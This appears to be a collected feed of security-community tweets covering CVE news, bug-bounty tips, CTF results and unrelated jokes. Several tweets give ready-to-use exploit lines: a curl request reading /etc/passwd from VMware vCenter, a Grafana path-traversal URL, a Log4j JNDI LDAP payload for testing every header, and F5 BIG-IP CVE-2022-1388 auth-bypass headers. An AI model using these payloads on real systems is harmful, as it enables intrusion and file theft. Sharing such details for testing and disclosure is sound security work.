Nuclei Template for CVE-2021-22205 - GitLab CE/EE Unauthenticated RCE using ExifTool Template: github.com/projectdiscove… #bugbounty #pentest #hackwithautomation #gitlab

FBI: FatPipe VPN Zero-Day Exploited by APT for 6 Months threatpost.com/fbi-fatpipe-vp…

#Learn365 Day-325: Android App Hacking Workshop Resource: bughunters.google.com/learn/presenta…

🚨 BLACK FRIDAY SPECIAL 🚨 Today and today only, you can find all of my free education and content, online FOR FREE! After today's sale, everything will return to normal asking price: $0.00! 😱

Sometimes you need to be creative to bypass CORS mitigations and achieve a successful site-wide CSRF. Here is an example:

NEWS JUST IN: R3billions wins first place at #athackcon’s Capture the Flag! 🚩🙌 A huge thank you to all contestants! With teams from Saudi Arabia, the UAE, Poland, the USA and more - this truly has been EPIC.

"Egypt" r0cks Great job r3billions, the 1st place winner at the AtHack CTF competition. #AtHack

مقتطفات من كلمة معالي المستشار تركي آل الشيخ وتكريمه للفائزين في تحديات #AtHack

I honestly think r3billions is one of the best CTF teams in the middle east. This is great! but this is also an opportunity to be one of the best in the world :) Don't miss that opportunity ;)

VMware vCenter unauthorized arbitrary file read PoC working to Earlier versions (7.0.2.00100) [PoC] curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd" github.com/l0ggg/VMware_v…

Seems like grafana's new LFI is at grafana-clock-panel plugin with a GET request, /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

#LOG4J2-3201 github.com/apache/logging… gitbox.apache.org/repos/asf?p=lo…

aaaaand then code execution?? #log4j #minecraft

trying to test every header of a website for #log4j? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips

Microsoft Teams: 1 feature, 4 vulnerabilities We stumbled upon several vulnerabilities in Team's link preview feature, out of which MS only fixed one so far. positive.security/blog/ms-teams-…

Next I’m buying Coca-Cola to put the cocaine back in

#CVE-2022-1388 F5's BIG-IP Unauth RCE Connection: keep-alive, X-F5-Auth-Token Authorization: Basic YWRtaW46 X-F5-Auth-Token: anything https://x.x.x.x:443/mgmt/tm/util/bash

Making HTTP header injection critical via response queue poisoning, by James Kettle portswigger.net/research/makin…

New blog post: Image Stacks and iPhone Racks - Building an Internet Scale Meme Search Engine findthatmeme.com/blog/2023/01/0…

DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS DOLPHINS